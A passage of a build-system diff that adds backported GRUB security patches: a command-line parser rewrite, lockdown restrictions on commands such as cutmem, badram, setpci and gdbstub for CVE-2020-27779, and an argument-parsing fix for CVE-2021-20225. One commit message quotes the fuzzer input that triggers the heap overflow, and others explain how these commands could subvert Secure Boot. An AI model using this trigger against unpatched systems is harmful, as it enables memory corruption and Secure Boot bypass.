+-		      *(bp++) = '\0';
+-		      (*argc)++;
+-		    }
+-		}
+-	      else if (use)
+-		*(bp++) = use;
+-	    }
+ 	  state = newstate;
+ 	}
+     }
+@@ -200,43 +245,60 @@ grub_parser_split_cmdline (const char *cmdline,
+ 
+   /* A special case for when the last character was part of a
+      variable.  */
+-  add_var (varname, &bp, &vp, state, GRUB_PARSER_STATE_TEXT);
++  if (add_var (varname, buffer, state, GRUB_PARSER_STATE_TEXT) != GRUB_ERR_NONE)
++    goto fail;
+ 
+-  if (bp != buffer && *(bp - 1))
+-    {
+-      *(bp++) = '\0';
+-      (*argc)++;
+-    }
++  /* Ensure that the last argument is terminated. */
++  if (terminate_arg (buffer, argc) != GRUB_ERR_NONE)
++    goto fail;
+ 
+   /* If there are no args, then we're done. */
+   if (!*argc)
+-    return 0;
+-
+-  /* Reserve memory for the return values.  */
+-  args = grub_malloc (bp - buffer);
+-  if (!args)
+-    return grub_errno;
+-  grub_memcpy (args, buffer, bp - buffer);
++    {
++      grub_errno = GRUB_ERR_NONE;
++      goto out;
++    }
+ 
+   *argv = grub_calloc (*argc + 1, sizeof (char *));
+   if (!*argv)
+-    {
+-      grub_free (args);
+-      return grub_errno;
+-    }
++    goto fail;
+ 
+   /* The arguments are separated with 0's, setup argv so it points to
+      the right values.  */
+-  bp = args;
+   for (i = 0; i < *argc; i++)
+     {
+-      (*argv)[i] = bp;
+-      while (*bp)
+-	bp++;
+-      bp++;
++      char *arg;
++
++      if (i > 0)
++	{
++	  if (grub_buffer_advance_read_pos (buffer, 1) != GRUB_ERR_NONE)
++	    goto fail;
++	}
++
++      arg = (char *) grub_buffer_peek_data (buffer);
++      if (arg == NULL ||
++	  grub_buffer_advance_read_pos (buffer, grub_strlen (arg)) != GRUB_ERR_NONE)
++	goto fail;
++
++      (*argv)[i] = arg;
+     }
+ 
+-  return 0;
++  /* Keep memory for the return values. */
++  grub_buffer_take_data (buffer);
++
++  grub_errno = GRUB_ERR_NONE;
++
++ out:
++  if (rd != cmdline)
++    grub_free (rd);
++  grub_buffer_free (buffer);
++  grub_buffer_free (varname);
++
++  return grub_errno;
++
++ fail:
++  grub_free (*argv);
++  goto out;
+ }
+ 
+ /* Helper for grub_parser_execute.  */
+diff --git a/include/grub/buffer.h b/include/grub/buffer.h
+new file mode 100644
+index 0000000..f4b10cf
+--- /dev/null
++++ b/include/grub/buffer.h
+@@ -0,0 +1,144 @@
++/*
++ *  GRUB  --  GRand Unified Bootloader
++ *  Copyright (C) 2021  Free Software Foundation, Inc.
++ *
++ *  GRUB is free software: you can redistribute it and/or modify
++ *  it under the terms of the GNU General Public License as published by
++ *  the Free Software Foundation, either version 3 of the License, or
++ *  (at your option) any later version.
++ *
++ *  GRUB is distributed in the hope that it will be useful,
++ *  but WITHOUT ANY WARRANTY; without even the implied warranty of
++ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
++ *  GNU General Public License for more details.
++ *
++ *  You should have received a copy of the GNU General Public License
++ *  along with GRUB.  If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_BUFFER_H
++#define GRUB_BUFFER_H	1
++
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++struct grub_buffer
++{
++  grub_uint8_t *data;
++  grub_size_t sz;
++  grub_size_t pos;
++  grub_size_t used;
++};
++
++/*
++ * grub_buffer_t represents a simple variable sized byte buffer with
++ * read and write cursors. It currently only implements
++ * functionality required by the only user in GRUB (append byte[s],
++ * peeking data at a specified position and updating the read cursor.
++ * Some things that this doesn't do yet are:
++ * - Reading a portion of the buffer by copying data from the current
++ *   read position in to a caller supplied destination buffer and then
++ *   automatically updating the read cursor.
++ * - Dropping the read part at the start of the buffer when an append
++ *   requires more space.
++ */
++typedef struct grub_buffer *grub_buffer_t;
++
++/* Allocate a new buffer with the specified initial size. */
++extern grub_buffer_t grub_buffer_new (grub_size_t sz);
++
++/* Free the buffer and its resources. */
++extern void grub_buffer_free (grub_buffer_t buf);
++
++/* Return the number of unread bytes in this buffer. */
++static inline grub_size_t
++grub_buffer_get_unread_bytes (grub_buffer_t buf)
++{
++  return buf->used - buf->pos;
++}
++
++/*
++ * Ensure that the buffer size is at least the requested
++ * number of bytes.
++ */
++extern grub_err_t grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req);
++
++/*
++ * Append the specified number of bytes from the supplied
++ * data to the buffer.
++ */
++static inline grub_err_t
++grub_buffer_append_data (grub_buffer_t buf, const void *data, grub_size_t len)
++{
++  grub_size_t req;
++
++  if (grub_add (buf->used, len, &req))
++    return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++  if (grub_buffer_ensure_space (buf, req) != GRUB_ERR_NONE)
++    return grub_errno;
++
++  grub_memcpy (&buf->data[buf->used], data, len);
++  buf->used = req;
++
++  return GRUB_ERR_NONE;
++}
++
++/* Append the supplied character to the buffer. */
++static inline grub_err_t
++grub_buffer_append_char (grub_buffer_t buf, char c)
++{
++  return grub_buffer_append_data (buf, &c, 1);
++}
++
++/*
++ * Forget and return the underlying data buffer. The caller
++ * becomes the owner of this buffer, and must free it when it
++ * is no longer required.
++ */
++extern void *grub_buffer_take_data (grub_buffer_t buf);
++
++/* Reset this buffer. Note that this does not deallocate any resources. */
++void grub_buffer_reset (grub_buffer_t buf);
++
++/*
++ * Return a pointer to the underlying data buffer at the specified
++ * offset from the current read position. Note that this pointer may
++ * become invalid if the buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data_at (grub_buffer_t buf, grub_size_t off)
++{
++  if (grub_add (buf->pos, off, &off))
++    {
++      grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected."));
++      return NULL;
++    }
++
++  if (off >= buf->used)
++    {
++      grub_error (GRUB_ERR_OUT_OF_RANGE, N_("peek out of range"));
++      return NULL;
++    }
++
++  return &buf->data[off];
++}
++
++/*
++ * Return a pointer to the underlying data buffer at the current
++ * read position. Note that this pointer may become invalid if the
++ * buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data (grub_buffer_t buf)
++{
++  return grub_buffer_peek_data_at (buf, 0);
++}
++
++/* Advance the read position by the specified number of bytes. */
++extern grub_err_t grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n);
++
++#endif /* GRUB_BUFFER_H */
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
new file mode 100644
index 0000000000..c82423b8af
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
@@ -0,0 +1,70 @@
+From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 14 Oct 2020 16:33:42 +0200
+Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown
+ is enforced
+
+The cutmem and badram commands can be used to remove EFI memory regions
+and potentially disable the UEFI Secure Boot. Prevent the commands to be
+registered if the GRUB is locked down.
+
+Fixes: CVE-2020-27779
+
+Reported-by: Teddy Reed <teddy.reed@gmail.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi        |  4 ++++
+ grub-core/mmap/mmap.c | 13 +++++++------
+ 2 files changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 47ac7ff..a1aaee6 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4051,6 +4051,10 @@ this page is to be filtered.  This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+ 
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++      This prevents removing EFI memory regions to potentially subvert the
++      security mechanisms provided by the UEFI secure boot.
++
+ @node blocklist
+ @subsection blocklist
+ 
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 57b4e9a..7ebf32e 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -20,6 +20,7 @@
+ #include <grub/memory.h>
+ #include <grub/machine/memory.h>
+ #include <grub/err.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut;
+ 
+ GRUB_MOD_INIT(mmap)
+ {
+-  cmd = grub_register_command ("badram", grub_cmd_badram,
+-			       N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
+-			       N_("Declare memory regions as faulty (badram)."));
+-  cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem,
+-				   N_("FROM[K|M|G] TO[K|M|G]"),
+-				   N_("Remove any memory regions in specified range."));
++  cmd = grub_register_command_lockdown ("badram", grub_cmd_badram,
++                                        N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
++                                        N_("Declare memory regions as faulty (badram)."));
++  cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem,
++                                            N_("FROM[K|M|G] TO[K|M|G]"),
++                                            N_("Remove any memory regions in specified range."));
+ 
+ }
+ 
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
new file mode 100644
index 0000000000..e33c96a05b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
@@ -0,0 +1,105 @@
+From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 09:00:05 +0100
+Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs
+ when locked down
+
+There are some more commands that should be restricted when the GRUB is
+locked down. Following is the list of commands and reasons to restrict:
+
+  * fakebios:   creates BIOS-like structures for backward compatibility with
+                existing OSes. This should not be allowed when locked down.
+
+  * loadbios:   reads a BIOS dump from storage and loads it. This action
+                should not be allowed when locked down.
+
+  * devicetree: loads a Device Tree blob and passes it to the OS. It replaces
+                any Device Tree provided by the firmware. This also should
+                not be allowed when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi                    |  3 +++
+ grub-core/commands/efi/loadbios.c | 16 ++++++++--------
+ grub-core/loader/arm/linux.c      |  6 +++---
+ grub-core/loader/efi/fdt.c        |  4 ++--
+ 4 files changed, 16 insertions(+), 13 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index a1aaee6..ccf1908 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux
+ kernel. Does not perform merging with any device tree supplied by firmware,
+ but rather replaces it completely.
+ @ref{GNU/Linux}.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++      This is done to prevent subverting various security mechanisms.
+ @end deffn
+ 
+ @node distrust
+diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c
+index d41d521..5c7725f 100644
+--- a/grub-core/commands/efi/loadbios.c
++++ b/grub-core/commands/efi/loadbios.c
+@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios;
+ 
+ GRUB_MOD_INIT(loadbios)
+ {
+-  cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios,
+-					0, N_("Create BIOS-like structures for"
+-					      " backward compatibility with"
+-					      " existing OS."));
+-
+-  cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios,
+-					N_("BIOS_DUMP [INT10_DUMP]"),
+-					N_("Load BIOS dump."));
++  cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios,
++						 0, N_("Create BIOS-like structures for"
++						       " backward compatibility with"
++						       " existing OS."));
++
++  cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios,
++						 N_("BIOS_DUMP [INT10_DUMP]"),
++						 N_("Load BIOS dump."));
+ }
+ 
+ GRUB_MOD_FINI(loadbios)
+diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c
+index d70c174..ed23dc7 100644
+--- a/grub-core/loader/arm/linux.c
++++ b/grub-core/loader/arm/linux.c
+@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux)
+ 				     0, N_("Load Linux."));
+   cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd,
+ 				      0, N_("Load initrd."));
+-  cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree,
+-					  /* TRANSLATORS: DTB stands for device tree blob.  */
+-					  0, N_("Load DTB file."));
++  cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree,
++						   /* TRANSLATORS: DTB stands for device tree blob. */
++						   0, N_("Load DTB file."));
+   my_mod = mod;
+   current_fdt = (const void *) grub_arm_firmware_get_boot_data ();
+   machine_type = grub_arm_firmware_get_machine_type ();
+diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c
+index ee9c559..003d07c 100644
+--- a/grub-core/loader/efi/fdt.c
++++ b/grub-core/loader/efi/fdt.c
+@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree;
+ GRUB_MOD_INIT (fdt)
+ {
+   cmd_devicetree =
+-    grub_register_command ("devicetree", grub_cmd_devicetree, 0,
+-			   N_("Load DTB file."));
++    grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0,
++				    N_("Load DTB file."));
+ }
+ 
+ GRUB_MOD_FINI (fdt)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
new file mode 100644
index 0000000000..f9a6a73ebc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
@@ -0,0 +1,37 @@
+From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 22:59:59 +0100
+Subject: [PATCH] commands/setpci: Restrict setpci command when locked down
+
+This command can set PCI devices register values, which makes it dangerous
+in a locked down configuration. Restrict it so can't be used on this setup.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/setpci.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c
+index d5bc97d..fa2ba7d 100644
+--- a/grub-core/commands/setpci.c
++++ b/grub-core/commands/setpci.c
+@@ -329,10 +329,10 @@ static grub_extcmd_t cmd;
+ 
+ GRUB_MOD_INIT(setpci)
+ {
+-  cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0,
+-			      N_("[-s POSITION] [-d DEVICE] [-v VAR] "
+-				 "REGISTER[=VALUE[:MASK]]"),
+-			      N_("Manipulate PCI devices."), options);
++  cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0,
++				       N_("[-s POSITION] [-d DEVICE] [-v VAR] "
++					  "REGISTER[=VALUE[:MASK]]"),
++				       N_("Manipulate PCI devices."), options);
+ }
+ 
+ GRUB_MOD_FINI(setpci)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
new file mode 100644
index 0000000000..a756f8d1cf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
@@ -0,0 +1,35 @@
+From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 12:59:29 +0100
+Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down
+
+The command can be used to get/set ATA disk parameters. Some of these can
+be dangerous since change the disk behavior. Restrict it when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hdparm.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c
+index d3fa966..2e2319e 100644
+--- a/grub-core/commands/hdparm.c
++++ b/grub-core/commands/hdparm.c
+@@ -436,9 +436,9 @@ static grub_extcmd_t cmd;
+ 
+ GRUB_MOD_INIT(hdparm)
+ {
+-  cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0,
+-			      N_("[OPTIONS] DISK"),
+-			      N_("Get/set ATA disk parameters."), options);
++  cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0,
++				       N_("[OPTIONS] DISK"),
++				       N_("Get/set ATA disk parameters."), options);
+ }
+ 
+ GRUB_MOD_FINI(hdparm)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
new file mode 100644
index 0000000000..b52273ff50
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
@@ -0,0 +1,62 @@
+From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 15:03:26 +0100
+Subject: [PATCH] gdb: Restrict GDB access when locked down
+
+The gdbstub* commands allow to start and control a GDB stub running on
+local host that can be used to connect from a remote debugger. Restrict
+this functionality when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gdb/gdb.c | 32 ++++++++++++++++++--------------
+ 1 file changed, 18 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c
+index 847a1e1..1818cb6 100644
+--- a/grub-core/gdb/gdb.c
++++ b/grub-core/gdb/gdb.c
+@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break;
+ GRUB_MOD_INIT (gdb)
+ {
+   grub_gdb_idtinit ();
+-  cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub,
+-			       N_("PORT"), 
+-			       /* TRANSLATORS: GDB stub is a small part of
+-				  GDB functionality running on local host
+-				  which allows remote debugger to
+-				  connect to it.  */
+-			       N_("Start GDB stub on given port"));
+-  cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break,
+-				     /* TRANSLATORS: this refers to triggering
+-					a breakpoint so that the user will land
+-					into GDB.  */
+-				     0, N_("Break into GDB"));
+-  cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop,
+-				    0, N_("Stop GDB stub"));
++  cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub,
++					N_("PORT"),
++					/*
++					 * TRANSLATORS: GDB stub is a small part of
++					 * GDB functionality running on local host
++					 * which allows remote debugger to
++					 * connect to it.
++					 */
++					N_("Start GDB stub on given port"));
++  cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break,
++					      /*
++					       * TRANSLATORS: this refers to triggering
++					       * a breakpoint so that the user will land
++					       * into GDB.
++					       */
++					      0, N_("Break into GDB"));
++  cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop,
++					     0, N_("Stop GDB stub"));
+ }
+ 
+ GRUB_MOD_FINI (gdb)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
new file mode 100644
index 0000000000..474826ade5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
@@ -0,0 +1,61 @@
+From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 14:44:38 +0100
+Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when
+ locked down
+
+The shim_lock verifier validates the XNU kernels but no its extensions
+and packages. Prevent these to be loaded when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 31 +++++++++++++++++--------------
+ 1 file changed, 17 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 77d7060..07232d2 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu)
+ 				      N_("Load XNU image."));
+   cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64,
+ 					0, N_("Load 64-bit XNU image."));
+-  cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0,
+-				     N_("Load XNU extension package."));
+-  cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0,
+-				    N_("Load XNU extension."));
+-  cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir,
+-				       /* TRANSLATORS: OSBundleRequired is a
+-					  variable name in xnu extensions
+-					  manifests. It behaves mostly like
+-					  GNU/Linux runlevels.
+-				       */
+-				       N_("DIRECTORY [OSBundleRequired]"),
+-				       /* TRANSLATORS: There are many extensions
+-					  in extension directory.  */
+-				       N_("Load XNU extension directory."));
++  cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0,
++					      N_("Load XNU extension package."));
++  cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0,
++					     N_("Load XNU extension."));
++  cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir,
++						/*
++						 * TRANSLATORS: OSBundleRequired is
++						 * a variable name in xnu extensions
++						 * manifests. It behaves mostly like
++						 * GNU/Linux runlevels.
++						 */
++						N_("DIRECTORY [OSBundleRequired]"),
++						/*
++						 * TRANSLATORS: There are many extensions
++						 * in extension directory.
++						 */
++						N_("Load XNU extension directory."));
+   cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0,
+    /* TRANSLATORS: ramdisk here isn't identifier. It can be translated.  */
+ 				       N_("Load XNU ramdisk. "
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
new file mode 100644
index 0000000000..e5d372a2b1
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
@@ -0,0 +1,65 @@
+From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Sat, 7 Nov 2020 01:03:18 +0100
+Subject: [PATCH] docs: Document the cutmem command
+
+The command is not present in the docs/grub.texi user documentation.
+
+Reported-by: Daniel Kiper <daniel.kiper@oracle.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index ccf1908..ae85f55 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help}
+ * cpuid::                       Check for CPU features
+ * crc::                         Compute or check CRC32 checksums
+ * cryptomount::                 Mount a crypto device
++* cutmem::                      Remove memory regions
+ * date::                        Display or set current date and time
+ * devicetree::                  Load a device tree blob
+ * distrust::                    Remove a pubkey from trusted keys
+@@ -4051,6 +4052,8 @@ this page is to be filtered.  This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+ 
++The command is similar to @command{cutmem} command.
++
+ Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
+       This prevents removing EFI memory regions to potentially subvert the
+       security mechanisms provided by the UEFI secure boot.
+@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules
+ be used.
+ @end deffn
+ 
++@node cutmem
++@subsection cutmem
++
++@deffn Command cutmem from[K|M|G] to[K|M|G]
++Remove any memory regions in specified range.
++@end deffn
++
++This command notifies the memory manager that specified regions of RAM ought to
++be filtered out. This remains in effect after a payload kernel has been loaded
++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels
++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot
++kernels in general.
++
++The command is similar to @command{badram} command.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++      This prevents removing EFI memory regions to potentially subvert the
++      security mechanisms provided by the UEFI secure boot.
+ 
+ @node date
+ @subsection date
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20225.patch b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
new file mode 100644
index 0000000000..b864febe62
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
@@ -0,0 +1,58 @@
+From 2a330dba93ff11bc00eda76e9419bc52b0c7ead6 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 16:07:29 +1100
+Subject: lib/arg: Block repeated short options that require an argument
+
+Fuzzing found the following crash:
+
+  search -hhhhhhhhhhhhhf
+
+We didn't allocate enough option space for 13 hints because the
+allocation code counts the number of discrete arguments (i.e. argc).
+However, the shortopt parsing code will happily keep processing
+a combination of short options without checking if those short
+options require an argument. This means you can easily end writing
+past the allocated option space.
+
+This fixes a OOB write which can cause heap corruption.
+
+Fixes: CVE-2021-20225
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2a330dba93ff11bc00eda76e9419bc52b0c7ead6]
+CVE: CVE-2021-20225
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/lib/arg.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/grub-core/lib/arg.c b/grub-core/lib/arg.c
+index 3288609..537c5e9 100644
+--- a/grub-core/lib/arg.c
++++ b/grub-core/lib/arg.c
+@@ -299,6 +299,19 @@ grub_arg_parse (grub_extcmd_t cmd, int argc, char **argv,
+ 		 it can have an argument value.  */
+ 	      if (*curshort)
+ 		{
++		  /*
++		   * Only permit further short opts if this one doesn't
++		   * require a value.
++		   */
++		  if (opt->type != ARG_TYPE_NONE &&
++		      !(opt->flags & GRUB_ARG_OPTION_OPTIONAL))
++		    {
++		      grub_error (GRUB_ERR_BAD_ARGUMENT,
++				  N_("missing mandatory option for `%s'"),
++				  opt->longarg);
++		      goto fail;
++		    }
++
+ 		  if (parse_option (cmd, opt, 0, usr) || grub_errno)
+ 		    goto fail;
+ 		}
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20233.patch b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
new file mode 100644
index 0000000000..d2069afc18
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
@@ -0,0 +1,50 @@
+From 2f533a89a8dfcacbf2c9dbc77d910f111f24bf33 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 17:10:48 +1100
